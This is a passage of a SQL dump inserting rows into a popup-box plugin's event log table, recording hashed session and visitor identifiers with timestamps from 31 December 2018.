(44643, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-31 07:16:02'),
(44644, 'c6ab27260bd6d3a7df58310a872bd38c', '66841fd6a0d57825', 0, 2, 1, '2018-12-31 07:40:34'),
(44645, 'a60579704f3f82345f617ad32175e08b', 'a1c6674e2d316581', 0, 2, 1, '2018-12-31 08:08:05'),
(44646, 'd56c509e91ad2d2c01076ab9df9e1b2e', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-31 08:22:58'),
(44647, 'd56c509e91ad2d2c01076ab9df9e1b2e', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-31 08:23:05'),
(44648, '980fece2cbede9988b07b6b25585f7e9', '6334141249aa07c7', 0, 2, 1, '2018-12-31 09:01:03'),
(44649, '980fece2cbede9988b07b6b25585f7e9', '6334141249aa07c7', 0, 2, 1, '2018-12-31 09:02:42'),
(44650, 'f6e7adec439e350ad36bffadefca3f2e', '3f8b78d4225c9c66', 0, 2, 1, '2018-12-31 09:02:45'),
(44651, 'a036adc3299b3d4366e018d06746a4e4', '49dcf43e026879b7', 0, 2, 1, '2018-12-31 09:03:54'),
(44652, '980fece2cbede9988b07b6b25585f7e9', '6334141249aa07c7', 0, 2, 1, '2018-12-31 09:04:20'),
(44653, '12c1445b882e721654247baa2cd0413c', 'a41f1678afca9c3e', 0, 2, 1, '2018-12-31 09:07:46'),
(44654, '12c1445b882e721654247baa2cd0413c', 'a41f1678afca9c3e', 0, 2, 1, '2018-12-31 09:08:10'),
(44655, 'dfb706c6780db8472a66e7faac6abc41', '882e280167c9f403', 0, 2, 1, '2018-12-31 09:24:21'),
(44656, '2987ef5c3a93810685e1d6d593466a05', '89f6a3f52ab752cf', 0, 2, 1, '2018-12-31 09:34:41'),
(44657, '2987ef5c3a93810685e1d6d593466a05', '89f6a3f52ab752cf', 0, 2, 1, '2018-12-31 09:35:23'),
(44658, 'c609745622fb8a0f5a2be795f81bb051', 'faf66bc135b0678f', 0, 2, 1, '2018-12-31 09:36:58'),
(44659, 'c609745622fb8a0f5a2be795f81bb051', 'faf66bc135b0678f', 0, 2, 1, '2018-12-31 09:40:07'),
(44660, 'c609745622fb8a0f5a2be795f81bb051', 'faf66bc135b0678f', 0, 2, 1, '2018-12-31 09:40:15'),
(44661, 'c609745622fb8a0f5a2be795f81bb051', 'faf66bc135b0678f', 0, 2, 1, '2018-12-31 09:41:07'),
(44662, '7e1cfe58c1fa1a2e024bfc8c43d71e32', 'ec298f16abca1ffa', 0, 2, 1, '2018-12-31 11:15:34'),
(44663, '7e1cfe58c1fa1a2e024bfc8c43d71e32', 'ec298f16abca1ffa', 0, 2, 1, '2018-12-31 11:15:48'),
(44664, '7e1cfe58c1fa1a2e024bfc8c43d71e32', 'ec298f16abca1ffa', 0, 2, 1, '2018-12-31 11:18:09'),
(44665, '0d1d0e0fb3b1f01f244672f3f8e6bcf4', '3c2eb30b505dddcf', 0, 2, 1, '2018-12-31 11:24:07'),
(44666, '2987ef5c3a93810685e1d6d593466a05', '89f6a3f52ab752cf', 0, 2, 1, '2018-12-31 11:24:45'),
(44667, '8d77f484c0225c30543af632d64dccbb', 'edcfc0c5e1871259', 0, 2, 1, '2018-12-31 11:47:21'),
(44668, 'ef7b38c51ad3f846a443b3e301274a37', '3bb6a25c32acfc4b', 0, 2, 1, '2018-12-31 12:49:54'),
(44669, '57a2e43210c3ba7d51f549c56aa6e4e9', 'd64f149e2e47966f', 0, 2, 1, '2018-12-31 12:55:32'),
(44670, 'aabe801e3699d4ec9ee8bac4ed49f5a6', '4bd9e00f4760aad2', 0, 2, 1, '2018-12-31 13:18:25'),
(44671, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-31 13:36:37'),
(44672, 'de06984e12261315d048f18ae430eae1', 'f556605047b35dd8', 0, 2, 1, '2018-12-31 13:49:53'),
(44673, '7fbbce075962d0ddeaeaa5f5ed51cff6', '4df5ced8675ad994', 0, 2, 1, '2018-12-31 13:50:41'),
(44674, '21e8129d5376c64a1003f82ea913a67a', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-31 14:46:38'),
(44675, '21e8129d5376c64a1003f82ea913a67a', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-31 14:47:31'),
(44676, '90681aa537fa69c84f380b4b05523fd3', '9e3af052f0debf1f', 0, 2, 1, '2018-12-31 15:14:06'),
(44677, '90681aa537fa69c84f380b4b05523fd3', '9e3af052f0debf1f', 0, 2, 1, '2018-12-31 15:17:07'),
(44678, '90681aa537fa69c84f380b4b05523fd3', '9e3af052f0debf1f', 0, 2, 1, '2018-12-31 15:21:22'),
(44679, '4ebd22da32598959c879063ca110434f', '4df5ced8675ad994', 0, 2, 1, '2018-12-31 15:37:37'),
(44680, '4b0595c9d5c71c0f03ff6082c5e2e2a6', 'fbf0576065758144', 0, 2, 1, '2018-12-31 15:43:19'),
(44681, '36c8c098e5d7223f1faaed694a70419b', '862de05e52f2a131', 0, 2, 1, '2018-12-31 15:46:42'),
(44682, '211227ddde39bd378f79bd468929b551', 'd04c5d81b6e92e1c', 0, 2, 1, '2018-12-31 15:55:08'),
(44683, '5c8b21d02b20bf2e948cc2e097ce6e24', '8449f7a7be41660e', 0, 2, 1, '2018-12-31 16:06:33'),
(44684, '5c8b21d02b20bf2e948cc2e097ce6e24', '8449f7a7be41660e', 0, 2, 1, '2018-12-31 16:06:42'),
(44685, '78e8fe36b1e1f1561badba60ca44e267', '95197db951bf429c', 0, 2, 1, '2018-12-31 16:13:07'),
(44686, '519ac65df53ae067e0af406c049804ad', '7e68ce54628f03c9', 0, 2, 1, '2018-12-31 16:20:12'),
(44687, '519ac65df53ae067e0af406c049804ad', '7e68ce54628f03c9', 0, 2, 1, '2018-12-31 16:20:31'),
(44688, '855941daa6136ce6cebce7a918a9caec', 'f9fb1efb06fab04a', 0, 2, 1, '2018-12-31 16:36:15'),
(44689, 'a81b1efd355eddcbf60d9b3f8b82894e', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-31 17:17:35'),
(44690, 'a81b1efd355eddcbf60d9b3f8b82894e', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-31 17:24:02'),
(44691, '11ccc9e3cf87076463a30b81fc8369e6', '4c38a2f2118e4994', 0, 2, 1, '2018-12-31 17:54:57'),
(44692, '11ccc9e3cf87076463a30b81fc8369e6', '4c38a2f2118e4994', 0, 2, 1, '2018-12-31 17:55:15'),
(44693, '2e0eeec1e1c569d94fa43a908ec11d54', '0bc2b417348310de', 0, 2, 1, '2018-12-31 17:56:09'),
(44694, '2e0eeec1e1c569d94fa43a908ec11d54', '0bc2b417348310de', 0, 2, 1, '2018-12-31 17:56:16'),
(44695, '495b0a2a9bdb707f20392661ae7b43b2', 'a41f1678afca9c3e', 0, 2, 1, '2018-12-31 18:03:16'),
(44696, '3f1a04b36203676738ef667bd0ae43f5', '96c932aec643b157', 0, 2, 1, '2018-12-31 18:03:34'),
(44697, '9d4655443bfe24ce42c2f4f32c6dc9f1', 'fb9ee79be5f70f04', 0, 2, 1, '2018-12-31 18:04:39'),
(44698, '30ab2f08ea7e624a4bc07d60f3943ad2', '8ab63283a3b62e24', 0, 2, 1, '2018-12-31 18:05:05'),
(44699, 'c9cc639d07d43ab9779d26fc7529a9b0', '41574ed7d8707215', 0, 2, 1, '2018-12-31 18:05:54'),
(44700, 'c9cc639d07d43ab9779d26fc7529a9b0', '41574ed7d8707215', 0, 2, 1, '2018-12-31 18:05:59'),
(44701, 'c9cc639d07d43ab9779d26fc7529a9b0', '41574ed7d8707215', 0, 2, 1, '2018-12-31 18:09:00'),
(44702, '21e8129d5376c64a1003f82ea913a67a', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-31 18:13:28'),
(44703, '21e8129d5376c64a1003f82ea913a67a', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-31 18:13:36'),
(44704, '3d68b794b66eeb1f0171e0594b37e307', 'b13b2fda24a05af3', 0, 2, 1, '2018-12-31 18:24:42'),
(44705, '18529fe0dd91db43ddd5a8cfbf07d27b', '48a725e8e60c2338', 0, 2, 1, '2018-12-31 18:25:19'),
(44706, '3d68b794b66eeb1f0171e0594b37e307', 'b13b2fda24a05af3', 0, 2, 1, '2018-12-31 18:25:53'),
(44707, '3d68b794b66eeb1f0171e0594b37e307', 'b13b2fda24a05af3', 0, 2, 1, '2018-12-31 18:26:00'),
(44708, '3d68b794b66eeb1f0171e0594b37e307', 'b13b2fda24a05af3', 0, 2, 1, '2018-12-31 18:26:28'),
(44709, 'b69c4ca67d23ec0a9a6e14ca509fe250', 'bbef1786b9d11abe', 0, 2, 1, '2018-12-31 18:27:35'),
(44710, '990b18fb1294820826f71d74d5eca8a6', '2f40b7dfffef6a47', 0, 2, 1, '2018-12-31 18:31:43'),
(44711, 'ae1f4e0bf1df65f4f54a973dfcdab00d', '6a9dd6888bcb8fcc', 0, 2, 1, '2018-12-31 18:34:14'),
(44712, 'ae1f4e0bf1df65f4f54a973dfcdab00d', '6a9dd6888bcb8fcc', 0, 2, 1, '2018-12-31 18:39:54'),
(44713, '9430013faeef8bf89a8fca8fcc97400f', 'f6500a8daed51ef4', 0, 2, 1, '2018-12-31 18:45:11'),
(44714, '4f042f6d939cd22e967b09765e4ac4cc', '4f09aee0c6e3c866', 0, 2, 1, '2018-12-31 18:45:42'),
(44715, '458dc24319005925d03d3028c4128000', '0b83b588375e9508', 0, 2, 1, '2018-12-31 18:46:41'),
(44716, 'e59eeee52471a0114cf6bea3d75981d8', 'e706e9a0184b2202', 0, 2, 1, '2018-12-31 18:46:48'),
(44717, 'e59eeee52471a0114cf6bea3d75981d8', 'e706e9a0184b2202', 0, 2, 1, '2018-12-31 19:01:35'),
(44718, '458dc24319005925d03d3028c4128000', '0b83b588375e9508', 0, 2, 1, '2018-12-31 19:10:29'),
(44719, '990b18fb1294820826f71d74d5eca8a6', '2f40b7dfffef6a47', 0, 2, 1, '2018-12-31 19:27:33'),
(44720, 'b566aa3df9a62a349c5ff53054cb166c', 'ea556e706f8f9277', 0, 2, 1, '2018-12-31 19:29:19'),
(44721, '500edf3d5a7bf2d3ee6a0c6d298daa1d', '28da63229c433c12', 0, 2, 1, '2018-12-31 19:30:01'),
(44722, '020b393accc466f07c328aa201416475', '6e117bd555667400', 0, 2, 1, '2018-12-31 19:39:21'),
(44723, 'b638605df3d86b22e6547922a1aa8a14', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-31 19:40:29'),
(44724, 'b638605df3d86b22e6547922a1aa8a14', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-31 19:41:05'),
(44725, 'b638605df3d86b22e6547922a1aa8a14', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-31 19:42:03'),
(44726, '1950ee49078f467273c6071440263524', 'dace6e0c219330fc', 0, 2, 1, '2018-12-31 19:44:17'),
(44727, '1950ee49078f467273c6071440263524', 'dace6e0c219330fc', 0, 2, 1, '2018-12-31 19:45:31'),
(44728, '7bcbf450c74bdb48c3a8c4a99abb4cd6', '74aba437eea39f30', 0, 2, 1, '2018-12-31 19:46:44'),
(44729, '081ba875ea2ece16bcafde364133843a', '1ec75219d7482e28', 0, 2, 1, '2018-12-31 19:47:15'),
(44730, '081ba875ea2ece16bcafde364133843a', '1ec75219d7482e28', 0, 2, 1, '2018-12-31 19:47:26'),
(44731, '081ba875ea2ece16bcafde364133843a', '1ec75219d7482e28', 0, 2, 1, '2018-12-31 19:47:32'),
(44732, '92549ea00fc5be746ec72f2e739d4e05', 'af1c5cc59dc7b877', 0, 2, 1, '2018-12-31 19:47:48'),
(44733, '081ba875ea2ece16bcafde364133843a', '1ec75219d7482e28', 0, 2, 1, '2018-12-31 19:48:16'),
(44734, '1950ee49078f467273c6071440263524', 'dace6e0c219330fc', 0, 2, 1, '2018-12-31 19:48:17'),
(44735, '34d8134420f71452996406be9daf4986', 'e38fbc76ae580892', 0, 2, 1, '2018-12-31 19:51:40'),
(44736, '807c1ec8b35c4b610b2cf6ffc224658d', 'ea556e706f8f9277', 0, 2, 1, '2018-12-31 19:51:53'),
(44737, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2018-12-31 19:51:57'),
(44738, '1950ee49078f467273c6071440263524', 'dace6e0c219330fc', 0, 2, 1, '2018-12-31 19:52:09'),
(44739, '34d8134420f71452996406be9daf4986', 'e38fbc76ae580892', 0, 2, 1, '2018-12-31 19:52:17'),
(44740, 'b638605df3d86b22e6547922a1aa8a14', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-31 19:52:21'),
(44741, '081ba875ea2ece16bcafde364133843a', '1ec75219d7482e28', 0, 2, 1, '2018-12-31 19:52:29'),
(44742, '807c1ec8b35c4b610b2cf6ffc224658d', 'ea556e706f8f9277', 0, 2, 1, '2018-12-31 19:53:27'),
(44743, '1950ee49078f467273c6071440263524', 'dace6e0c219330fc', 0, 2, 1, '2018-12-31 19:54:38'),
(44744, '081ba875ea2ece16bcafde364133843a', '1ec75219d7482e28', 0, 2, 1, '2018-12-31 19:55:41'),
(44745, '807c1ec8b35c4b610b2cf6ffc224658d', 'ea556e706f8f9277', 0, 2, 1, '2018-12-31 19:55:56'),
(44746, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2018-12-31 19:56:44'),
(44747, 'b638605df3d86b22e6547922a1aa8a14', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-31 19:59:46'),
(44748, '34d8134420f71452996406be9daf4986', 'e38fbc76ae580892', 0, 2, 1, '2018-12-31 20:00:52'),
(44749, '7001f29c9bb7a2d18441b1d77d7faf36', 'da6c922121ca1f89', 0, 2, 1, '2018-12-31 20:02:33'),
(44750, '11da8c9c381bef5f5f81b0ba0166f1b0', 'ee0826f8778c48c2', 0, 2, 1, '2018-12-31 20:02:47'),
(44751, '11da8c9c381bef5f5f81b0ba0166f1b0', 'ee0826f8778c48c2', 0, 2, 1, '2018-12-31 20:02:55'),
(44752, '11da8c9c381bef5f5f81b0ba0166f1b0', 'ee0826f8778c48c2', 0, 2, 1, '2018-12-31 20:03:05'),
(44753, 'b3055dbd3d2c832534eee1c7a4b9c5fa', '638f6b1ac3b915c3', 0, 2, 1, '2018-12-31 20:04:13'),
(44754, 'ae1f4e0bf1df65f4f54a973dfcdab00d', '6a9dd6888bcb8fcc', 0, 2, 1, '2018-12-31 20:04:19'),
(44755, '020b393accc466f07c328aa201416475', '6e117bd555667400', 0, 2, 1, '2018-12-31 20:04:41'),
(44756, 'f6ed66fccc14e569bc465c71d3e0ba79', 'a86d0aa20820f4cb', 0, 2, 1, '2018-12-31 20:06:01'),
(44757, '58d2a6a86fa07b5b9d04cabaf8f4e626', 'f284efc5468b83ab', 0, 2, 1, '2018-12-31 20:06:15'),
(44758, 'f6ed66fccc14e569bc465c71d3e0ba79', 'a86d0aa20820f4cb', 0, 2, 1, '2018-12-31 20:06:25'),
(44759, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2018-12-31 20:07:26'),
(44760, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2018-12-31 20:07:30'),
(44761, '92549ea00fc5be746ec72f2e739d4e05', 'af1c5cc59dc7b877', 0, 2, 1, '2018-12-31 20:08:15'),
(44762, 'd2a12f4179961e854f7a554421535900', 'c69b16a8ac60521f', 0, 2, 1, '2018-12-31 20:08:35'),
(44763, '0386c65af555bc52d0d7461d431dced5', '9c8948e3925746c5', 0, 2, 1, '2018-12-31 20:10:02'),
(44764, '0386c65af555bc52d0d7461d431dced5', '9c8948e3925746c5', 0, 2, 1, '2018-12-31 20:10:10'),
(44765, '3fe751e3e217bfac9ec9088ee9a6ac1f', '814e14b432590743', 0, 2, 1, '2018-12-31 20:10:22'),
(44766, 'e706700b1e292841395e924211a62c62', 'a4d9d8225838853d', 0, 2, 1, '2018-12-31 20:10:49'),
(44767, '6cf8592fd5620d4a8435109114b216cf', '89bc496b2aebc80a', 0, 2, 1, '2018-12-31 20:11:30'),
(44768, '0fbb81ed12db20465e43da636c8f3a6c', '417b807dff7c6249', 0, 2, 1, '2018-12-31 20:11:32'),
(44769, '81ba424e1b74594b3d2b60b027ef4e90', 'c123e74a1d22036a', 0, 2, 1, '2018-12-31 20:12:31'),
(44770, '81ba424e1b74594b3d2b60b027ef4e90', 'c123e74a1d22036a', 0, 2, 1, '2018-12-31 20:12:41'),
(44771, 'b1bf8854675ea57e4a31fb14152386df', '1c68b977b911188c', 0, 2, 1, '2018-12-31 20:14:34'),
(44772, 'ff54f6387ad5ab467a66637294969245', 'e38fbc76ae580892', 0, 2, 1, '2018-12-31 20:14:45'),
(44773, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-31 20:15:05'),
(44774, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-31 20:16:19'),
(44775, '86cb8e49e56abfc2b1bd8297eb1b2f10', 'c5cb4fe55b6b1b30', 0, 2, 1, '2018-12-31 20:17:07'),
(44776, '3fe751e3e217bfac9ec9088ee9a6ac1f', '814e14b432590743', 0, 2, 1, '2018-12-31 20:17:14'),
(44777, '310bb2b0da8a6049e6bef0de2486696a', 'fcc58e2a6012f1b1', 0, 2, 1, '2018-12-31 20:17:57'),
(44778, '86cb8e49e56abfc2b1bd8297eb1b2f10', 'c5cb4fe55b6b1b30', 0, 2, 1, '2018-12-31 20:18:15'),
(44779, '4a8fb396678fd612baa6f06b6437d809', 'e5ac70981815b3ea', 0, 2, 1, '2018-12-31 20:18:20'),
(44780, '3502c4a009c782cbee92edd9725e674f', '7501b42c35accff7', 0, 2, 1, '2018-12-31 20:18:31'),
(44781, '1c7c75c6cb7084d0006e85cb8a16b21a', '5546a509e0a852da', 0, 2, 1, '2018-12-31 20:19:03'),
(44782, 'f56c4cd6c2c09cf0e27b478eaf10467f', 'ed2a8ad46e58c6cd', 0, 2, 1, '2018-12-31 20:19:15'),
(44783, '86cb8e49e56abfc2b1bd8297eb1b2f10', 'c5cb4fe55b6b1b30', 0, 2, 1, '2018-12-31 20:19:38'),
(44784, 'a416638db61a19b7d4c28777468d59bd', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-31 20:19:57'),
(44785, 'a416638db61a19b7d4c28777468d59bd', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-31 20:20:02'),
(44786, '4fc077345117277e8e548d93ce71db6c', '46713cac27a94b83', 0, 2, 1, '2018-12-31 20:20:59'),
(44787, '4fc077345117277e8e548d93ce71db6c', '46713cac27a94b83', 0, 2, 1, '2018-12-31 20:21:07'),
(44788, '688cc3a598ced87c375922b86ba82dfc', '9b4b5273cd52b84a', 0, 2, 1, '2018-12-31 20:21:45'),
(44789, '835eb6bc859c6931c86ba001215fc924', '164bf105f63e26a9', 0, 2, 1, '2018-12-31 20:22:38'),
(44790, '3f6c4025d34fe7fc6071cb8aed5c3ebb', 'a9692e589f1e5f6f', 0, 2, 1, '2018-12-31 20:24:57'),
(44791, '3f6c4025d34fe7fc6071cb8aed5c3ebb', 'a9692e589f1e5f6f', 0, 2, 1, '2018-12-31 20:25:17'),
(44792, '86e4a277eb517d59bae45e7af1fb561a', 'e74a2ac966dcd07f', 0, 2, 1, '2018-12-31 20:25:34'),
(44793, '86e4a277eb517d59bae45e7af1fb561a', 'e74a2ac966dcd07f', 0, 2, 1, '2018-12-31 20:26:12'),
(44794, 'd2a12f4179961e854f7a554421535900', 'c69b16a8ac60521f', 0, 2, 1, '2018-12-31 20:26:22'),
(44795, '4638d7078966a37e61afbd3ffb9bf96a', '6b3cdc433b8a5b6c', 0, 2, 1, '2018-12-31 20:28:51'),
(44796, '3f6c4025d34fe7fc6071cb8aed5c3ebb', 'a9692e589f1e5f6f', 0, 2, 1, '2018-12-31 20:28:57'),
(44797, '7a1714cada5bc338bfb0d64f81bff554', 'a41f1678afca9c3e', 0, 2, 1, '2018-12-31 20:29:00'),
(44798, '75b1fe0d676bf44e537cdc12e15ba64d', '5b8feb9d5a8a5e5d', 0, 2, 1, '2018-12-31 20:30:54'),
(44799, '75b1fe0d676bf44e537cdc12e15ba64d', '5b8feb9d5a8a5e5d', 0, 2, 1, '2018-12-31 20:31:02'),
(44800, '75b1fe0d676bf44e537cdc12e15ba64d', '5b8feb9d5a8a5e5d', 0, 2, 1, '2018-12-31 20:31:07'),
(44801, '75b1fe0d676bf44e537cdc12e15ba64d', '5b8feb9d5a8a5e5d', 0, 2, 1, '2018-12-31 20:31:10'),
(44802, '75b1fe0d676bf44e537cdc12e15ba64d', '5b8feb9d5a8a5e5d', 0, 2, 1, '2018-12-31 20:31:14'),
(44803, '62eba8d876fa42582be91fbd0bef3c1e', 'e3454d790deac400', 0, 2, 1, '2018-12-31 20:31:39'),
(44804, 'e706700b1e292841395e924211a62c62', 'a4d9d8225838853d', 0, 2, 1, '2018-12-31 20:32:01'),
(44805, '76aa49309ffe617222f96864ed895f21', '6eeb73100567cbda', 0, 2, 1, '2018-12-31 20:32:26'),
(44806, '062a0a92fb7f693f0712a73db9ebcfc4', '91d21119de46096c', 0, 2, 1, '2018-12-31 20:32:42'),
(44807, '5446f7fdf7df8a9bb130f37475df0adf', 'd53a1e82bf0b9288', 0, 2, 1, '2018-12-31 20:32:48'),
(44808, '75b1fe0d676bf44e537cdc12e15ba64d', '5b8feb9d5a8a5e5d', 0, 2, 1, '2018-12-31 20:32:51'),
(44809, '062a0a92fb7f693f0712a73db9ebcfc4', '91d21119de46096c', 0, 2, 1, '2018-12-31 20:32:51'),
(44810, 'd53fce05a271700023dd588122101b34', '6fe56a3cd549b6ed', 0, 2, 1, '2018-12-31 20:32:53'),
(44811, 'b8e29bca7fb20e503137ef3a8bb1bb04', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-31 20:34:06'),
(44812, '81ba424e1b74594b3d2b60b027ef4e90', 'c123e74a1d22036a', 0, 2, 1, '2018-12-31 20:34:30'),
(44813, '81ba424e1b74594b3d2b60b027ef4e90', 'c123e74a1d22036a', 0, 2, 1, '2018-12-31 20:34:38'),
(44814, 'e59eeee52471a0114cf6bea3d75981d8', 'e706e9a0184b2202', 0, 2, 1, '2018-12-31 20:34:57'),
(44815, '73a7155fb8c7822ca8c517718e7139e2', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-31 20:37:00'),
(44816, '62eba8d876fa42582be91fbd0bef3c1e', 'e3454d790deac400', 0, 2, 1, '2018-12-31 20:37:22'),
(44817, '92549ea00fc5be746ec72f2e739d4e05', 'af1c5cc59dc7b877', 0, 2, 1, '2018-12-31 20:42:21'),
(44818, '86cb8e49e56abfc2b1bd8297eb1b2f10', 'c5cb4fe55b6b1b30', 0, 2, 1, '2018-12-31 20:43:19'),
(44819, '86cb8e49e56abfc2b1bd8297eb1b2f10', 'c5cb4fe55b6b1b30', 0, 2, 1, '2018-12-31 20:43:36'),
(44820, '5446f7fdf7df8a9bb130f37475df0adf', 'd53a1e82bf0b9288', 0, 2, 1, '2018-12-31 20:43:47'),
(44821, '86cb8e49e56abfc2b1bd8297eb1b2f10', 'c5cb4fe55b6b1b30', 0, 2, 1, '2018-12-31 20:44:05'),
(44822, '809b910ecb702bb4c9203e4031cc9406', '092b99cc18eb4124', 0, 2, 1, '2018-12-31 20:44:18'),
(44823, '92549ea00fc5be746ec72f2e739d4e05', 'af1c5cc59dc7b877', 0, 2, 1, '2018-12-31 20:44:47'),
(44824, 'd0077e0682d7a4ad24cf8841bd6d1b68', 'e3038f2b751243df', 0, 2, 1, '2018-12-31 20:45:08'),
(44825, '3502c4a009c782cbee92edd9725e674f', '7501b42c35accff7', 0, 2, 1, '2018-12-31 20:45:26'),
(44826, 'de9239e89f7158f830707d733bd209a8', 'cff6a6d6076e274f', 0, 2, 1, '2018-12-31 20:45:27'),
(44827, '7e02e1a4afdeeaf20b3f2f006c58df87', '83bb13387505b354', 0, 2, 1, '2018-12-31 20:45:52'),
(44828, 'e59eeee52471a0114cf6bea3d75981d8', 'e706e9a0184b2202', 0, 2, 1, '2018-12-31 20:48:00'),
(44829, '0e56dbbf318fcc1da7d1bd0e1d6046a0', 'fc290d8bf25d1be0', 0, 2, 1, '2018-12-31 20:48:45'),
(44830, '672a91010582497cda130c4f717d202e', '02ee6768142e877d', 0, 2, 1, '2018-12-31 20:49:11'),
(44831, '22c121ca0158dd92c2f4bc60438bac5e', 'cb6b61634331b281', 0, 2, 1, '2018-12-31 20:51:01'),
(44832, '4a8fb396678fd612baa6f06b6437d809', 'e5ac70981815b3ea', 0, 2, 1, '2018-12-31 20:52:37'),
(44833, 'd0077e0682d7a4ad24cf8841bd6d1b68', 'e3038f2b751243df', 0, 2, 1, '2018-12-31 20:52:52'),
(44834, 'd0077e0682d7a4ad24cf8841bd6d1b68', 'e3038f2b751243df', 0, 2, 1, '2018-12-31 20:53:03'),
(44835, '3502c4a009c782cbee92edd9725e674f', '7501b42c35accff7', 0, 2, 1, '2018-12-31 20:53:17'),
(44836, 'de57b9544cf290379582b618daafa4b4', 'b6169a438d71e404', 0, 2, 1, '2018-12-31 20:54:51'),
(44837, '2adf0902152dbeb961f3385b27ba2374', '094c4fc3019f9165', 0, 2, 1, '2018-12-31 20:55:20'),
(44838, 'de57b9544cf290379582b618daafa4b4', 'b6169a438d71e404', 0, 2, 1, '2018-12-31 20:55:23'),
(44839, '2adf0902152dbeb961f3385b27ba2374', '094c4fc3019f9165', 0, 2, 1, '2018-12-31 20:55:53'),
(44840, 'a38e437678133f1f48200146bd0d60d5', '0590f2c35fb16469', 0, 2, 1, '2018-12-31 20:56:04'),
(44841, 'a38e437678133f1f48200146bd0d60d5', '0590f2c35fb16469', 0, 2, 1, '2018-12-31 20:56:09'),
(44842, '7e02e1a4afdeeaf20b3f2f006c58df87', '83bb13387505b354', 0, 2, 1, '2018-12-31 20:56:27'),
(44843, 'de57b9544cf290379582b618daafa4b4', 'b6169a438d71e404', 0, 2, 1, '2018-12-31 20:56:29'),
(44844, '20518faf701f1324a017e0e344d5d907', 'de9b8e6bc6e762ed', 0, 2, 1, '2018-12-31 20:57:51'),
(44845, 'e59eeee52471a0114cf6bea3d75981d8', 'e706e9a0184b2202', 0, 2, 1, '2018-12-31 20:57:52'),
(44846, '7f3aaf3cc0f57353e1a0f15c2e507d75', '2034f09284a4c7ca', 0, 2, 1, '2018-12-31 20:58:45'),
(44847, 'b31dc4ad6cf527d3db8e5baa3f9c59ab', 'e4f14b65de899e06', 0, 2, 1, '2018-12-31 20:59:38'),
(44848, '0f5a20ff899edd67b29b85425dc1e0be', '4ce86d8ca7b57c4f', 0, 2, 1, '2018-12-31 21:02:03'),
(44849, '48f446e79efd836658ead5a8907fa25a', '73d056ba5e877742', 0, 2, 1, '2018-12-31 21:02:39'),
(44850, '89918de47ec804de915f0b8336ff03d2', 'c020abbb40884763', 0, 2, 1, '2018-12-31 21:03:53'),
(44851, '89918de47ec804de915f0b8336ff03d2', 'c020abbb40884763', 0, 2, 1, '2018-12-31 21:04:05'),
(44852, 'bdc5e51898a14f864b4c5c703c32deb8', '3b340dd412704e09', 0, 2, 1, '2018-12-31 21:04:49');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(44853, 'bdc5e51898a14f864b4c5c703c32deb8', '3b340dd412704e09', 0, 2, 1, '2018-12-31 21:06:29'),
(44854, 'a4fb1cf96c24f08c66c8cd62f4a9754c', 'b6169a438d71e404', 0, 2, 1, '2018-12-31 21:07:09'),
(44855, '2adf0902152dbeb961f3385b27ba2374', '094c4fc3019f9165', 0, 2, 1, '2018-12-31 21:07:12'),
(44856, 'a4fb1cf96c24f08c66c8cd62f4a9754c', 'b6169a438d71e404', 0, 2, 1, '2018-12-31 21:07:16'),
(44857, 'bdc5e51898a14f864b4c5c703c32deb8', '3b340dd412704e09', 0, 2, 1, '2018-12-31 21:08:04'),
(44858, '0f5a20ff899edd67b29b85425dc1e0be', '4ce86d8ca7b57c4f', 0, 2, 1, '2018-12-31 21:08:54'),
(44859, '15eddb5aef4a19ee73273f5b1db1a427', '4c07673592205f17', 0, 2, 1, '2018-12-31 21:10:23'),
(44860, 'ef39b48b6c4ce07a446f586c9fbec713', '7419aba62c2e4622', 0, 2, 1, '2018-12-31 21:11:55'),
(44861, 'e706700b1e292841395e924211a62c62', 'a4d9d8225838853d', 0, 2, 1, '2018-12-31 21:12:16'),
(44862, '8136e79824ef3e760b963211ca6ea7aa', '80d0e70110ede451', 0, 2, 1, '2018-12-31 21:12:49'),
(44863, 'e706700b1e292841395e924211a62c62', 'a4d9d8225838853d', 0, 2, 1, '2018-12-31 21:14:57'),
(44864, 'e59eeee52471a0114cf6bea3d75981d8', 'e706e9a0184b2202', 0, 2, 1, '2018-12-31 21:15:28'),
(44865, '9fe0e33cb4624bc4e15d71c6c978cbee', '086f4ac25342203e', 0, 2, 1, '2018-12-31 21:15:30'),
(44866, '3fe751e3e217bfac9ec9088ee9a6ac1f', '814e14b432590743', 0, 2, 1, '2018-12-31 21:15:33'),
(44867, '21e8129d5376c64a1003f82ea913a67a', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-31 21:16:18'),
(44868, '21e8129d5376c64a1003f82ea913a67a', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-31 21:16:26'),
(44869, '3420ff921216785202b83fd698e1e6c5', '776dcce744ef316e', 0, 2, 1, '2018-12-31 21:16:52'),
